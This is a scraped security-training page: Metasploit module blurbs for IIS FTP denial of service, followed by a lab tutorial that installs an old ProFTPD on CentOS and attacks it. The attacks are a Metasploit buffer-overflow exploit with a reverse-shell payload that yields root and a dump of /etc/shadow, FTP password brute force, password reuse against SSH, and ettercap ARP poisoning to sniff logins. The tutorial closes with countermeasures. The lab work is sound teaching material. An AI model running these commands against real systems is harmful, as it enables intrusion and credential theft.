- Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Meta…
- Microsoft IIS - HTTP Request Denial Of Service
Microsoft IIS FTP Server LIST Stack Exhaustion This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the 'FTP Publishing' must be configured as 'manual' mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.
Free Metasploit Download Get your copy of the world's leading penetration testing tool Module Name auxiliary/dos/windows/ftp/iislistexhaustion Authors. Kingcope. Myo Soe References. URL:. URL: Reliability.
Development. Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf use auxiliary/dos/windows/ftp/iislistexhaustion msf auxiliary( iislistexhaustion) show actions.actions. Msf auxiliary( iislistexhaustion) set ACTION msf auxiliary( iislistexhaustion) show options.show and set options. Msf auxiliary( iislistexhaustion) run Related Vulnerabilities.
Free Metasploit Download Get your copy of the world's leading penetration testing tool Module Name auxiliary/dos/windows/ftp/iis75ftpdiacbof Authors. Matthew Bergin. jduck References.
URL: Reliability. Development. Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf use auxiliary/dos/windows/ftp/iis75ftpdiacbof msf auxiliary( iis75ftpdiacbof) show actions.actions. Msf auxiliary( iis75ftpdiacbof) set ACTION msf auxiliary( iis75ftpdiacbof) show options.show and set options. Msf auxiliary( iis75ftpdiacbof) run Related Vulnerabilities.
In this article we are going to learn how to configure ProFTPD service in a CentOS machine. After that we will conduct penetration testing to evaluate the security of FTP service and then we will also learn the countermeasures for vulnerabilities. Installation and Configuration of FTP Service on Centos Linux Machine 1 The source code of the older version of ProFTPD server (1.3.3a) was downloaded from the ProFTPD source code repository, located.
The commands used were (without the hash sign) (ProFTPD, 2011): # cd/usr/local/src # wget -c ‘ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2’ 2 For compilation of the source code, development libraries and compilers need to be installed on the CentOS machine. They were installed using the following command (ProFTPD, 2013): # yum -y groupinstall ‘Development tools’ 3 The ProFTPD server runs as a non-privileged user on the Linux system for security reasons. A group called ftpd was created and then a user called ftpd was also created that belonged to the ftpd group. The following commands were used. Command Used Purpose groupaddftpd Creates a new group called ftpd and populates the /etc/group file. Useradd –g ftpdftpd Creates a new user called ftpd that has ftpd as its primary group (specified by the –g parameter) and populates the /etc/passwd file. 4 Once the user and group ftpd were added, the next step was to compile the source code of the ProFTP server to produce the ProFTPD binary, which supports the FTP (file transport protocol).
The following commands were used to achieve this (ProFTPD, 2011). Command Used (continued) Purpose installuser=ftpdinstallgroup=ftpd./configure –prefix=/usr –sysconfdir=/etc This command runs a shell script called configure in the current directory. This script checks the build dependencies and the machine architecture on which the software is going to compile. The main task of this command is to generate a file called “Makefile.” The “Makefile” contains the compilation and installation instructions that is read by the make command. The installuser and installgroup commands instruct the configure utility that the user and group used by the ProFTPDare ftpd and ftpd, respectively.
The prefix=/usr instructs the configure utility that the binaries should be installed on /usr directory rather than /usr/local directory (default). Finally, the sysconfdir=/etc instructs the configure script that the configuration files should be installed in the /etc directory. Make This command compiles the binary as per the instructions loaded in the Makefile. Make install This command installs the compiled binaries, which include the ProFTPD daemon called proftpd.
5 Once the binaries were compiled, the location of proftpd was found out using the following command: # which proftpd The version was also checked using the following command: #/usr/sbin/proftpd –v 6 The main configuration file of the ProFTPD server, called proftpd.conf, which is located at /etc, was edited using vi editor. The final configuration file looked like the following. The configuration is heavily commented (comments starts with # sign) for explanation: The same file has the configuration directive, starting with and ending with, and all the directives inside it were commented out (by putting a hash sign in front of the configuration) to disable anonymous FTP service on the ProFTPD server. The final configuration file only allows local Linux accounts/users (users defined by the /etc/passwd) and chroot (restricts) them to their home directory so that they cannot break out of that directory. 7 Since the ProFTPD daemon is configured to support local Linux account and to chroot user to his/her home directory, a new user called prithak with password password was added to the Linux system for testing. The following commands were used: # useradd prithak # passwd prithak(enter password prithak twice) Similarly, another user called Daniel was also added to the system.
Finally, now we have the following users on the system. Username Password prithak 1234qwer daniel 1a2b3c chintan a1b2c3d4 8 The ProFTP server (192.168.79.135) was started in debugging mode and was accessed from the Windows machine (192.168.79.1) using the in-built Windows ftp command. The user prithak (having password prithak) was able to successfully log into the ProFTPD server and at the same time the ProFTPD server produced debugging logs on the standard output to confirm the details of the login. The proftpd was started using the following command line options: proftpd -n -d 4 -c /etc/proftpd.conf –ipv4 The options are as follows: -n Runs the proftpd process in standalone mode (must be configured as such in the configuration file), but does not background the process or disassociate it from the controlling tty.
Additionally, all output (log or debug messages) are sent to stderr, rather than the syslog mechanism.d Runs the ProFTPD server in debugging mode. The 4 parameter increases the verbosity of the logging to 4.c /etc/proftpd.conf Instructs the ProFTPD daemon to read the configuration file located at /etc/proftpd.conf. –ipv4 Instructs the ProFTPD daemon to listen only on IPV4 addresses, i.e., disabled IPV6 (if present). 9 To ensure that the ProFTP server running on (192.168.79.135) starts every time Linux is restarted, the initialization script (init script) that comes with the source of the ProFTP was copied to the CentOS INIT V (initialization system V) script directory (/etc/rc.d/init.d). Then the script was made executable. Finally, the ProFTPD service was turned on, using the chkconfig command.
# cp /usr/local/src/proftpd-1.3.3a/contrib/dist/rpm/proftpd.init.d /etc/rc.d/init.d/proftpd # chmod 775 /etc/rc.d/init.d/proftpd # chkconfig proftpd on Reconnaissance, Footprinting, and Exploitation 1 Reconnaissance and Footprinting The first step in every vulnerability assessment is to find what services are running and the version of the service; this is called reconnaissance and footprinting. To complete this step a port scan against the target machine should be launched. Following the same principal, nmap port scanner was launched against the machine using the following parameters: root@bt:# nmap -sS -PN -n -sV -sC 192.168.79.135 The Nmap scan result indicated that the remote machine has two open ports: 22 (SSH) and 21 (FTP). Also, the version of the FTP server running on the remote machine is ProFTPD 1.3.3a and that of SSH is OpenSSH 5.3. Also, the SSH server only supports SSH protocol version 2.0.
2 Buffer Overflow Attack Against the ProFTPD Service When known vulnerabilities for ProFTPD 1.3.3a were searched on the Internet, the following results were obtained: The vulnerability “CVE-2010-4221” was identified to be affecting the version of ProFTPD 1.3.3.a that we were running. Metasploit Command Description use exploit/linux/ftp/proftptelnetiac Loads the proftptelnetiac exploit into the current context. Set RHOST 192.168.79.135 The target host of the exploit, i.e., the IP address of the vulnerable machine. Set payload linux/x86/shellreversetcp The shell code that will be executed after successful exploitation.
Here the reverse shell payload is chosen. The reverse shell payload connects back to the attacker after the exploit is successful. The IP to which the exploit should connect back is set by the LHOST parameter. Set LHOST 192.168.79.144 The IP address of the attacker. Exploit –j Launch the exploit as a background session.
As a result of successful exploitation, reverse shell was obtained on the 192.168.79.135 (ProFTP) server. A new session was created for the shell, which could be listed using “session –l” command in the metasploit console.
Ethical Hacking Training – Resources (InfoSec) To interact with the session, the “session –i 1” command was used. To check the privilege level of the user who has triggered the reverse shell, the following command was used:.
Id This command prints the effective user id of the user. The output showed that we had uid 0 and gid 0 i.e. We were root user. whoami This command is used to print the user-friendly name of the current user. The output of this command also confirmed that we had root access in the machine. Since we had the privileges of the super user (root), we were also able to dump the /etc/shadow file, which contains the password hashes of various users in the system and is only readable/writeable by the root user.
The following screenshot shows the interaction: 2 Brute-Force and Password Reuse Attack Against the ProFTP Server To carry out a password brute-force attack against the ProFTP server, the following Python script was written. This script tries to brute-force the password of users prithak, chintan, and daniel. The default password file that comes with bracktrack is used as the password database file. Using the above Python script, the password of the FTP users’ prithak, chintan, and daniel were brute forced and obtained successfully. The following screenshot shows the password obtained: Since most systems use the same username and password for multiple services, the username and passwords that were obtained from the previous attacks were used against the SSH server running on the same server. This attack is also called the “password reuse attack” (Harper,2011).
The password reuse attack was successful and the above credentials were also valid for SSH login. The following screenshot shows the successful SSH login: 3 ARP Poisoning and Password Sniffing Attack Since the FTP protocol sends username and passwords in clear text, it is susceptible to password sniffing attacks. In this attack, the following IP machines are involved: 192.168.79.135 ProFTP Server (FTP Server) 192.168.79.144 Backtrack (Attacker) 192.168.79.150 Windows XP (FTP Client) The following screenshot shows the address resolution protocol table in the Windows XP host before the ARP poisoning attack is launched: It can be seen that the all the hosts have different MAC addresses associated with them. Now, since the attacker is on the same LAN segment as the FTP server and the FTP client, it is possible for the attacker to launch an ARP poisoning attack so that he can sit in the middle of the FTP exchanges and sniff the password. To do this, the following steps were performed on the attacker’s machine:. Ettercap utility was used to launched an ARP poisoning attack against both the 192.168.79.150 Windows XP (FTP Client) and the 192.168.79.135 ProFTP Server (FTP Server).
The following command was used: # ettercap –iface eth4 –text –quiet –mitmarp /192.168.79.150/ /192.168.79.135/. The following screenshot shows the ARP table on the Windows XP machine before and after the attack was launched:. Now, when the client logs into the FTP server, the ettercap utility grabs the password and prints it.
Countermeasures 1 Countermeasure Against Buffer Overflow Exploit Since the older version of ProFTPD is being run on the system, the most effective countermeasure is to install the latest version of the same software. Another countermeasure is to install a more secure version of FTP server that has a very good security track record. The pureftpd server seems to have a better security track record than the ProFTPD server. To apply the countermeasure, we choose to upgrade the PureFTPD into the latest version.
Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Meta…
This was done by following similar steps that were used to install the older version of ProFTPD. The steps used were: The running version of the ProFTPD server was stopped using the following command: # service proftpd stop The older version of the ProFTPD server was removed by entering its source directory and using the “make deinstall” command. # cd /usr/local/src/proftpd-1.3.3a # make deinstall. The latest version of ProFTPD was started and then the lsof command was used to verify that FTP server was running: It was also possible to login into the FTP using the same username and passwords that were used earlier.
This proved that the upgraded FTP service was indeed working perfectly. When the same exploit that was used previously was launched against that ProFTPD server using metasploit, it failed. This verified that the service was patched. Also, at the time of writing, no known exploits (local or remote) exist for the ProFTPD server version 1.3.5-rc2 that we are running.
2 Countermeasure Against Password Sniffing and Password Reuse Attack The FTP protocol can be secured by using the FTP over the SSL (FTPS) protocol. The following steps can be performed to enable FTPS:.
To test the login, the FileZilla FTP client was installed and it was able to successfully log in to the ProFTPD server using SSL/TLS. However, a warning message related to the certificate was shown. This is due to the fact that the certificate is self-signed. Once the certificate was accepted, on successive logins there were no errors.
Also, passwords used for the FTP server should be secure and strong. The FTP users should have their shell changed to /bin/false, which will ensure that the FTP users will not be able to login over SSH, telnet, or TTY sessions. This was done using the following commands: # chsh -s /bin/false prithak # chsh -s /bin/false daniel # chsh -s /bin/false chintan # echo /bin/false /etc/shells 3 Countermeasure Against Password Brute-Force Attack To defend against password brute-force attack, the following steps were taken:. When FTP password brute force attack is carried out from IP address 192.168.79.222 (backtrack) on the ProFTPD server (192.168.79.135), the attack is detected and the IP address of the attacker is blocked:. The iptables rule to block the IP 192.168.79.222 that was inserted by fail2ban is highlighted below: CONCLUSION ProFTPD server was installed from source and attacked using buffer overflow exploit, password sniffing, and password brute-force attacks.
Also, the service was secured using compulsory SSL/TLS certificates and the Fail2ban intrusion detection system and by upgrading the service to the latest version. References: http://www.proftpd.org/docs/howto/Compiling.html. Warlock works as a Information Security Professional. He has quite a few global certifications to his name such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure. Free Practice Exams.
Microsoft IIS - HTTP Request Denial Of Service
Free Training Tools. Editors Choice. Related Boot Camps. Related Job Titles.
More Posts by Author. 3 responses to “Penetration Testing of an FTP Service”.
Anonymous The “ftp/anonymous” scanner will scan a range of IP addresses searching for FTP servers that allow anonymous access and determines where read or write permissions are allowed. Msf use auxiliary/scanner/ftp/anonymous msf auxiliary( anonymous) show options Module options: Name Current Setting Required Description - - - - FTPPASS [email protected] no The password for the specified username FTPUSER anonymous no The username to authenticate as RHOSTS yes The target address range or CIDR identifier RPORT 21 yes The target port THREADS 1 yes The number of concurrent threads Configuring the module is a simple matter of setting the IP range we wish to scan along with the number of concurrent threads and let it run.